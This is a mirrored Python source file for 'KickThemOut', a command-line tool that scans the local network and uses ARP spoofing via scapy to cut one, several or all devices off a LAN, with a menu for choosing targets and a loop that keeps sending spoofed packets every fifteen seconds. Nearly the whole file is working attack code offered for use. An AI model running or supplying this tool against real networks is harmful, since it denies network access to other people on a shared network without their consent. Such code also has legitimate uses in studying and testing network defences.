mirror of
https://github.com/k4m4/kickthemout.git
synced 2024-11-25 14:34:23 +01:00
306 lines
11 KiB
Python
306 lines
11 KiB
Python
#!/usr/bin/env python
|
|
# -.- coding: utf-8 -.-
|
|
# kickthemout.py
|
|
# authors: k4m4 & xdavidhu
|
|
|
|
"""
|
|
Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com)
|
|
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
|
|
"""
|
|
|
|
import time, os, sys, logging, math
|
|
import scan, spoof
|
|
from time import sleep
|
|
import urllib2 as urllib
|
|
|
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
|
|
from scapy.all import *
|
|
|
|
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
|
|
|
|
|
|
def heading():
|
|
sys.stdout.write(GREEN + """
|
|
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
|
|
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
|
|
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
|
|
█ █ ▐█ █▄ ▄▀ █ █ █ █ █ █▄ ▄▀ █ █ ▀████ █ █ █
|
|
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
|
|
▀ ▀ ▀ ▀ ▀▀▀
|
|
""" + END + BLUE +
|
|
'\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW,
|
|
BLUE).center(88) +
|
|
'\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(
|
|
YELLOW, RED, YELLOW, BLUE).center(67) +
|
|
'\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(77))
|
|
|
|
|
|
def optionBanner():
|
|
print('\nChoose option from menu:\n')
|
|
sleep(0.2)
|
|
print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE)
|
|
sleep(0.2)
|
|
print('\t{0}[{1}2{2}]{3} Kick SOME Off').format(YELLOW, RED, YELLOW, WHITE)
|
|
sleep(0.2)
|
|
print('\t{0}[{1}3{2}]{3} Kick ALL Off').format(YELLOW, RED, YELLOW, WHITE)
|
|
sleep(0.2)
|
|
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
|
|
|
|
|
|
def scanNetwork():
|
|
global hostsList
|
|
hostsList = scan.scanNetwork()
|
|
regenOnlineIPs()
|
|
|
|
def regenOnlineIPs():
|
|
global onlineIPs
|
|
global defaultGatewayMac
|
|
|
|
onlineIPs = []
|
|
for host in hostsList:
|
|
onlineIPs.append(host[0])
|
|
if host[0] == defaultGatewayIP:
|
|
defaultGatewayMac = host[1]
|
|
|
|
|
|
def kickoneoff(): # TODO: do not allow only one device!!
|
|
os.system("clear||cls")
|
|
|
|
print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END)
|
|
scanNetwork()
|
|
|
|
print("Online IPs: ")
|
|
|
|
for i in range(len(onlineIPs)):
|
|
mac = ""
|
|
for host in hostsList:
|
|
if host[0] == onlineIPs[i]:
|
|
mac = host[1]
|
|
vendor = resolveMac(mac)
|
|
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t"+ vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
|
|
|
|
canBreak = False
|
|
while not canBreak:
|
|
try:
|
|
choice = int(raw_input("\nChoose a target: "))
|
|
canBreak = True
|
|
except KeyboardInterrupt:
|
|
return
|
|
except:
|
|
print("{0}[!] Please enter a number!{1}").format(RED, END)
|
|
|
|
one_target_ip = onlineIPs[choice]
|
|
one_target_mac = ""
|
|
for host in hostsList:
|
|
if host[0] == one_target_ip:
|
|
one_target_mac = host[1]
|
|
if one_target_mac == "":
|
|
print("\nIP address is not up. Please try again.")
|
|
return # TODO: Test "break"
|
|
|
|
# print("\n{0}Target mac => '{1}" + one_target_mac + "{2}'{3}\n").format(GREEN, RED, GREEN, END) # {TESTING}
|
|
print("\n{0}Spoofing started... {1}").format(GREEN, END)
|
|
try:
|
|
while True:
|
|
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
|
time.sleep(15)
|
|
except KeyboardInterrupt:
|
|
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
|
|
rearp = 1
|
|
while rearp != 10:
|
|
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
|
rearp = rearp + 1
|
|
time.sleep(0.5)
|
|
print("{0}Re-arped{1} target successfully.{2}").format(RED, GREEN, END)
|
|
|
|
|
|
def kicksomeoff():
|
|
os.system("clear||cls")
|
|
|
|
print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END)
|
|
scanNetwork()
|
|
|
|
print("Online IPs: ")
|
|
|
|
for i in range(len(onlineIPs)):
|
|
mac = ""
|
|
for host in hostsList:
|
|
if host[0] == onlineIPs[i]:
|
|
mac = host[1]
|
|
vendor = resolveMac(mac)
|
|
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
|
|
|
|
canBreak = False
|
|
while not canBreak:
|
|
try:
|
|
choice = raw_input("\nChoose devices to target(comma-separated): ")
|
|
canBreak = True
|
|
except KeyboardInterrupt:
|
|
return
|
|
|
|
some_targets = choice.split(",")
|
|
|
|
some_ipList = ""
|
|
for i in some_targets:
|
|
try:
|
|
some_ipList += GREEN + "'" + RED + onlineIPs[int(i)] + GREEN + "', "
|
|
except KeyboardInterrupt:
|
|
return
|
|
except:
|
|
print("\n{0}ERROR: '{1}" + i + "{2}' is not in the list.{3}\n").format(RED, GREEN, RED, END)
|
|
return
|
|
some_ipList = some_ipList[:-2] + END
|
|
|
|
print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END)
|
|
|
|
print("\n{0}Spoofing started... {1}\n").format(GREEN, END)
|
|
try:
|
|
while True:
|
|
for i in some_targets:
|
|
ip = onlineIPs[int(i)]
|
|
for host in hostsList:
|
|
if host[0] == ip:
|
|
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
|
|
time.sleep(15)
|
|
except KeyboardInterrupt:
|
|
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
|
|
rearp = 1
|
|
while rearp != 10:
|
|
for i in some_targets:
|
|
ip = onlineIPs[int(i)]
|
|
for host in hostsList:
|
|
if host[0] == ip:
|
|
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
|
|
rearp = rearp + 1
|
|
time.sleep(0.5)
|
|
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
|
|
|
|
def kickalloff():
|
|
os.system("clear||cls")
|
|
|
|
print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END)
|
|
scanNetwork()
|
|
|
|
print("Online IPs: ")
|
|
for i in range(len(onlineIPs)):
|
|
mac = ""
|
|
for host in hostsList:
|
|
if host[0] == onlineIPs[i]:
|
|
mac = host[1]
|
|
vendor = resolveMac(mac)
|
|
print(str(" {0}"+ str(onlineIPs[i]) + "{1}\t" + vendor + "{2}").format(RED, GREEN, END))
|
|
|
|
print("\n{0}Targets: {1}" + ', '.join(onlineIPs)).format(GREEN, END) # {TESTING}
|
|
|
|
print("\n{0}Spoofing started... {1}\n").format(GREEN, END)
|
|
try:
|
|
reScan = 0
|
|
while True:
|
|
for host in hostsList:
|
|
if host[0] != defaultGatewayIP:
|
|
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
|
|
reScan = reScan + 1
|
|
if reScan == 4:
|
|
reScan = 0
|
|
scanNetwork()
|
|
time.sleep(15)
|
|
except KeyboardInterrupt:
|
|
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
|
|
rearp = 1
|
|
while rearp != 10:
|
|
for host in hostsList:
|
|
if host[0] != defaultGatewayIP:
|
|
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
|
|
rearp = rearp + 1
|
|
time.sleep(0.5)
|
|
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
|
|
|
|
|
|
def getDefaultInterface():
|
|
def long2net(arg):
|
|
if (arg <= 0 or arg >= 0xFFFFFFFF):
|
|
raise ValueError("illegal netmask value", hex(arg))
|
|
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
|
|
def to_CIDR_notation(bytes_network, bytes_netmask):
|
|
network = scapy.utils.ltoa(bytes_network)
|
|
netmask = long2net(bytes_netmask)
|
|
net = "%s/%s" % (network, netmask)
|
|
if netmask < 16:
|
|
return None
|
|
return net
|
|
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
|
|
# skip loopback network and default gw
|
|
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
|
|
continue
|
|
if netmask <= 0 or netmask == 0xFFFFFFFF:
|
|
continue
|
|
net = to_CIDR_notation(network, netmask)
|
|
if interface != scapy.config.conf.iface:
|
|
continue
|
|
if net:
|
|
return interface
|
|
|
|
def getGatewayIP():
|
|
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
|
|
return getGateway_p.src
|
|
|
|
def resolveMac(mac):
|
|
try:
|
|
url = "http://macvendors.co/api/vendorname/"
|
|
request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"})
|
|
response = urllib.urlopen(request)
|
|
vendor = response.read()
|
|
vendor = vendor.decode("utf-8")
|
|
vendor = vendor[:25]
|
|
return vendor
|
|
except:
|
|
return "N/A"
|
|
|
|
def main():
|
|
|
|
heading()
|
|
|
|
print(
|
|
"\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}"
|
|
+ defaultGatewayIP + "{6}'. {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN,
|
|
RED, GREEN, RED, GREEN, END)
|
|
try:
|
|
|
|
while True:
|
|
|
|
optionBanner()
|
|
|
|
header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END))
|
|
choice = raw_input(header)
|
|
|
|
if choice.upper() == 'E' or choice.upper() == 'EXIT':
|
|
print('\n{0}Thanks for dropping by.'
|
|
'\nCatch ya later!{1}').format(GREEN, END)
|
|
raise SystemExit
|
|
elif choice == '1':
|
|
kickoneoff()
|
|
# EXECUTE kickoneoff FUNCTION (SCAN & PARSE)
|
|
elif choice == '2':
|
|
kicksomeoff()
|
|
# EXECUTE kicksomeoff FUNCTION
|
|
elif choice == '3':
|
|
kickalloff()
|
|
# EXECUTE kickalloff FUNCTION (FF:FF:FF:FF:FF:FF)
|
|
elif choice.upper() == 'CLEAR':
|
|
os.system("clear||cls")
|
|
# else:
|
|
# print('*INVALID OPTION*')
|
|
|
|
except KeyboardInterrupt:
|
|
print('\n\n{0}Thanks for dropping by.'
|
|
'\nCatch ya later!{1}').format(GREEN, END)
|
|
|
|
|
|
if __name__ == '__main__':
|
|
|
|
defaultInterface = getDefaultInterface()
|
|
defaultGatewayIP = getGatewayIP()
|
|
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
|
|
scanNetwork()
|
|
|
|
main() |